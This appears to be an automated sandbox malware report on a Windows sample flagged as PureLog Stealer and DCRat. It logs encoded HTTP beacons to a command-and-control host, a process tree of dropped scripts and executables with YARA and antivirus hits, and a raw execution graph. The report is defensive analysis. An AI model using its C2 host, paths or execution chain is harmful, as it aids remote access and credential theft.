                                                                    Mar 5, 2024 22:28:56.512701988 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    96 | 192.168.2.5 | 49821 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:56.849678040 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:57.062222004 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:57.063110113 CET2596OUTData Raw: 51 5e 54 59 5b 58 55 54 5e 57 5a 51 57 5d 50 5f 54 53 54 5f 56 54 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q^TY[XUT^WZQW]P_TST_VTWXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9E82.W$\'6>Y8<"]']190W"<!,_&4%Z2Y;%Z"!Q*9
                                                                    Mar 5, 2024 22:28:57.302175045 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    97 | 192.168.2.5 | 49822 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:57.641391993 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:57.854506969 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:57.854836941 CET2596OUTData Raw: 51 5c 54 5a 5b 5a 55 5c 5e 57 5a 51 57 5d 50 59 54 54 54 58 56 5b 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q\TZ[ZU\^WZQW]PYTTTXV[WTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/6V'3]36,/*X$8'18!Z(!/X'4;1&Y-)%Z"!Q*9
                                                                    Mar 5, 2024 22:28:58.094347000 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    98 | 192.168.2.5 | 49823 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:58.425725937 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:58.637345076 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:58.637620926 CET2596OUTData Raw: 51 59 51 59 5b 5e 55 52 5e 57 5a 51 57 5b 50 5a 54 55 54 58 56 55 57 55 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QYQY[^UR^WZQW[PZTUTXVUWUT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9@;!5$U60&\,.X&82,#<8"7'7?_&:/%Z"!Q*!
                                                                    Mar 5, 2024 22:28:58.874694109 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    99 | 192.168.2.5 | 49825 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:59.241233110 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:59.451145887 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:59.451585054 CET1920OUTData Raw: 51 5e 54 5e 5b 5c 50 54 5e 57 5a 51 57 5c 50 5d 54 57 54 52 56 59 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q^T^[\PT^WZQW\P]TWTRVYW^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,!*S$U=^3%/%3;/&9!<#<7Y01?2\,%Z"!Q*=
                                                                    Mar 5, 2024 22:28:59.686433077 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    100 | 192.168.2.5 | 49826 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:59.368438005 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:59.581146002 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:29:27.380537987 CET2596OUTData Raw: 54 59 51 59 5b 5b 55 53 5e 57 5a 51 57 50 50 5f 54 5d 54 5c 56 54 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TYQY[[US^WZQWPP_T]T\VTWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/&%3[3&!;*\3;$1;"!(&$+X%/%;%Z"!Q*
                                                                    Mar 5, 2024 22:29:27.763983965 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:29:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Target ID:0
                                                                    Start time:22:26:52
                                                                    Start date:05/03/2024
                                                                    Path:C:\Users\user\Desktop\hT7clR9Gz2.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\hT7clR9Gz2.exe
                                                                    Imagebase:0x7c0000
                                                                    File size:2'733'200 bytes
                                                                    MD5 hash:0CADB063C76CEC669E88F104493A56F1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2002850710.0000000006AB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:22:26:53
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe"
                                                                    Imagebase:0xfc0000
                                                                    File size:147'456 bytes
                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:22:27:19
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\PortCommon\jweBRAt.bat" "
                                                                    Imagebase:0x790000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:22:27:19
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:22:27:19
                                                                    Start date:05/03/2024
                                                                    Path:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\PortCommon/hyperbrokerhostNetsvc.exe
                                                                    Imagebase:0xc40000
                                                                    File size:5'964'288 bytes
                                                                    MD5 hash:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.2263404724.0000000000C42000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2308672698.0000000013281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 88%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:22:27:23
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Uhg5bQrQMo.bat"
                                                                    Imagebase:0x7ff65b050000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:22:27:23
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:22:27:23
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\System32\chcp.com
                                                                    Wow64 process (32bit):false
                                                                    Commandline:chcp 65001
                                                                    Imagebase:0x7ff78afa0000
                                                                    File size:14'848 bytes
                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:22:27:23
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\System32\PING.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:ping -n 10 localhost
                                                                    Imagebase:0x7ff71f7b0000
                                                                    File size:22'528 bytes
                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:22:27:34
                                                                    Start date:05/03/2024
                                                                    Path:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\mozilla maintenance service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe"
                                                                    Imagebase:0x5b0000
                                                                    File size:5'964'288 bytes
                                                                    MD5 hash:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3259059706.00000000055E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 88%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:false

                                                                      Execution Graph

                                                                      Execution Coverage:9.8%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:10.2%
                                                                      Total number of Nodes:1503
                                                                      Total number of Limit Nodes:32
calls 2 library calls 24323->24337 24324->24284 24326 7df5c9 24339 7e238d RaiseException 24326->24339 24327->24326 24338 7e238d RaiseException 24327->24338 24330 7df5e6 24332 7d4a80 __EH_prolog 24331->24332 24333 7deb38 8 API calls 24332->24333 24334 7d4a9c 24333->24334 24335 7c7b8b 24334->24335 24340 7d0e46 80 API calls 24334->24340 24335->24287 24337->24323 24338->24326 24339->24330 24340->24335 24342 7c828e __EH_prolog 24341->24342 24370 7c13dc 24342->24370 24344 7c82aa 24345 7c82bb 24344->24345 24513 7c9f42 24344->24513 24350 7c82f2 24345->24350 24378 7c1a04 24345->24378 24509 7c1692 24350->24509 24351 7c8389 24397 7c8430 24351->24397 24355 7c83e8 24405 7c1f6d 24355->24405 24358 7c83f3 24358->24350 24409 7c3b2d 24358->24409 24421 7c848e 24358->24421 24360 7ca56d 7 API calls 24361 7c82ee 24360->24361 24361->24350 24361->24351 24361->24360 24517 7cc0c5 CompareStringW _wcslen 24361->24517 24364 7ca582 24363->24364 24368 7ca5b0 24364->24368 24790 7ca69b 24364->24790 24366 7ca592 24367 7ca597 FindClose 24366->24367 24366->24368 24367->24368 24368->24288 24369->24294 24371 7c13e1 __EH_prolog 24370->24371 24372 7cce40 8 API calls 24371->24372 24373 7c1419 24372->24373 24374 7deb38 8 API calls 24373->24374 24377 7c1474 _abort 24373->24377 24375 7c1461 24374->24375 24375->24377 24518 7cb505 24375->24518 24377->24344 24379 7c1a0e __EH_prolog 24378->24379 24391 7c1a61 24379->24391 24393 7c1b9b 24379->24393 24534 7c13ba 24379->24534 24381 7c1bc7 24537 7c138b 74 API calls 24381->24537 24384 7c3b2d 101 API calls 24388 7c1c12 24384->24388 24385 7c1bd4 24385->24384 24385->24393 24386 7c1c5a 24390 7c1c8d 24386->24390 24386->24393 24538 7c138b 74 API calls 24386->24538 24388->24386 24389 7c3b2d 101 API calls 24388->24389 24389->24388 24390->24393 24395 7c9e80 79 API calls 24390->24395 24391->24381 24391->24385 24391->24393 24392 7c3b2d 101 API calls 24394 7c1cde 24392->24394 24393->24361 24394->24392 24394->24393 24395->24394 24396 7c9e80 79 API calls 24396->24391 24556 7ccf3d 
24397->24556 24399 7c8440 24560 7d13d2 GetSystemTime SystemTimeToFileTime 24399->24560 24401 7c83a3 24401->24355 24402 7d1b66 24401->24402 24561 7dde6b 24402->24561 24406 7c1f72 __EH_prolog 24405->24406 24408 7c1fa6 24406->24408 24569 7c19af 24406->24569 24408->24358 24410 7c3b3d 24409->24410 24411 7c3b39 24409->24411 24420 7c9e80 79 API calls 24410->24420 24411->24358 24412 7c3b4f 24413 7c3b78 24412->24413 24414 7c3b6a 24412->24414 24725 7c286b 101 API calls 3 library calls 24413->24725 24416 7c3baa 24414->24416 24724 7c32f7 89 API calls 2 library calls 24414->24724 24416->24358 24418 7c3b76 24418->24416 24726 7c20d7 74 API calls 24418->24726 24420->24412 24422 7c8498 __EH_prolog 24421->24422 24425 7c84d5 24422->24425 24436 7c8513 24422->24436 24751 7d8c8d 103 API calls 24422->24751 24424 7c84f5 24426 7c851c 24424->24426 24427 7c84fa 24424->24427 24425->24424 24430 7c857a 24425->24430 24425->24436 24426->24436 24753 7d8c8d 103 API calls 24426->24753 24427->24436 24752 7c7a0d 152 API calls 24427->24752 24430->24436 24727 7c5d1a 24430->24727 24432 7c8605 24432->24436 24733 7c8167 24432->24733 24435 7c8797 24437 7ca56d 7 API calls 24435->24437 24438 7c8802 24435->24438 24436->24358 24437->24438 24739 7c7c0d 24438->24739 24440 7cd051 82 API calls 24446 7c885d 24440->24446 24441 7c8992 24442 7c8a5f 24441->24442 24449 7c89e1 24441->24449 24447 7c8ab6 24442->24447 24460 7c8a6a 24442->24460 24443 7c898b 24756 7c2021 74 API calls 24443->24756 24446->24436 24446->24440 24446->24441 24446->24443 24754 7c8117 84 API calls 24446->24754 24755 7c2021 74 API calls 24446->24755 24452 7c8a4c 24447->24452 24759 7c7fc0 97 API calls 24447->24759 24448 7c8ab4 24453 7c959a 80 API calls 24448->24453 24449->24452 24454 7ca231 3 API calls 24449->24454 24457 7c8b14 24449->24457 24450 7c9105 24451 7c959a 80 API calls 24450->24451 24451->24436 24452->24448 24452->24457 24453->24436 24456 7c8a19 24454->24456 24456->24452 24757 7c92a3 97 API calls 24456->24757 24457->24450 24469 7c8b82 
24457->24469 24760 7c98bc 24457->24760 24458 7cab1a 8 API calls 24461 7c8bd1 24458->24461 24460->24448 24758 7c7db2 101 API calls 24460->24758 24464 7cab1a 8 API calls 24461->24464 24479 7c8be7 24464->24479 24467 7c8b70 24764 7c6e98 77 API calls 24467->24764 24469->24458 24470 7c8cbc 24471 7c8d18 24470->24471 24472 7c8e40 24470->24472 24473 7c8d8a 24471->24473 24476 7c8d28 24471->24476 24474 7c8e66 24472->24474 24475 7c8e52 24472->24475 24495 7c8d49 24472->24495 24483 7c8167 19 API calls 24473->24483 24478 7d3377 75 API calls 24474->24478 24477 7c9215 123 API calls 24475->24477 24480 7c8d6e 24476->24480 24487 7c8d37 24476->24487 24477->24495 24481 7c8e7f 24478->24481 24479->24470 24482 7c8c93 24479->24482 24489 7c981a 79 API calls 24479->24489 24480->24495 24767 7c77b8 111 API calls 24480->24767 24484 7d3020 123 API calls 24481->24484 24482->24470 24765 7c9a3c 82 API calls 24482->24765 24486 7c8dbd 24483->24486 24484->24495 24491 7c8df5 24486->24491 24492 7c8de6 24486->24492 24486->24495 24766 7c2021 74 API calls 24487->24766 24489->24482 24769 7c9155 93 API calls __EH_prolog 24491->24769 24768 7c7542 85 API calls 24492->24768 24500 7c8f85 24495->24500 24770 7c2021 74 API calls 24495->24770 24497 7c9090 24497->24450 24498 7ca4ed 3 API calls 24497->24498 24501 7c90eb 24498->24501 24499 7c903e 24746 7c9da2 24499->24746 24500->24450 24500->24497 24500->24499 24745 7c9f09 SetEndOfFile 24500->24745 24501->24450 24771 7c2021 74 API calls 24501->24771 24504 7c9085 24505 7c9620 77 API calls 24504->24505 24505->24497 24507 7c90fb 24772 7c6dcb 76 API calls _wcschr 24507->24772 24510 7c16a4 24509->24510 24788 7ccee1 86 API calls 24510->24788 24514 7c9f59 24513->24514 24515 7c9f63 24514->24515 24789 7c6d0c 78 API calls 24514->24789 24515->24345 24517->24361 24519 7cb50f __EH_prolog 24518->24519 24524 7cf1d0 82 API calls 24519->24524 24521 7cb521 24525 7cb61e 24521->24525 24524->24521 24526 7cb630 _abort 24525->24526 24529 7d10dc 24526->24529 24532 7d109e GetCurrentProcess 
GetProcessAffinityMask 24529->24532 24533 7cb597 24532->24533 24533->24377 24539 7c1732 24534->24539 24536 7c13d6 24536->24396 24537->24393 24538->24390 24540 7c1748 24539->24540 24551 7c17a0 __InternalCxxFrameHandler 24539->24551 24541 7c1771 24540->24541 24552 7c6c36 76 API calls __vswprintf_c_l 24540->24552 24543 7c17c7 24541->24543 24547 7c178d ___std_exception_copy 24541->24547 24545 7e3e3e 22 API calls 24543->24545 24544 7c1767 24553 7c6ca7 75 API calls 24544->24553 24548 7c17ce 24545->24548 24547->24551 24554 7c6ca7 75 API calls 24547->24554 24548->24551 24555 7c6ca7 75 API calls 24548->24555 24551->24536 24552->24544 24553->24541 24554->24551 24555->24551 24557 7ccf4d 24556->24557 24559 7ccf54 24556->24559 24558 7c981a 79 API calls 24557->24558 24558->24559 24559->24399 24560->24401 24562 7dde78 24561->24562 24563 7ce617 53 API calls 24562->24563 24564 7dde9b 24563->24564 24565 7c4092 _swprintf 51 API calls 24564->24565 24566 7ddead 24565->24566 24567 7dd4d4 16 API calls 24566->24567 24568 7d1b7c 24567->24568 24568->24355 24570 7c19bf 24569->24570 24573 7c19bb 24569->24573 24574 7c9e80 79 API calls 24570->24574 24571 7c19d4 24575 7c18f6 24571->24575 24573->24408 24574->24571 24576 7c1908 24575->24576 24577 7c1945 24575->24577 24578 7c3b2d 101 API calls 24576->24578 24583 7c3fa3 24577->24583 24580 7c1928 24578->24580 24580->24573 24587 7c3fac 24583->24587 24584 7c3b2d 101 API calls 24584->24587 24585 7c1966 24585->24580 24588 7c1e50 24585->24588 24587->24584 24587->24585 24600 7d0e08 24587->24600 24589 7c1e5a __EH_prolog 24588->24589 24608 7c3bba 24589->24608 24591 7c1e84 24592 7c1732 78 API calls 24591->24592 24594 7c1f0b 24591->24594 24593 7c1e9b 24592->24593 24636 7c18a9 78 API calls 24593->24636 24594->24580 24596 7c1eb3 24598 7c1ebf _wcslen 24596->24598 24637 7d1b84 MultiByteToWideChar 24596->24637 24638 7c18a9 78 API calls 24598->24638 24601 7d0e0f 24600->24601 24604 7d0e2a 24601->24604 24606 7c6c31 RaiseException _com_raise_error 24601->24606 24603 
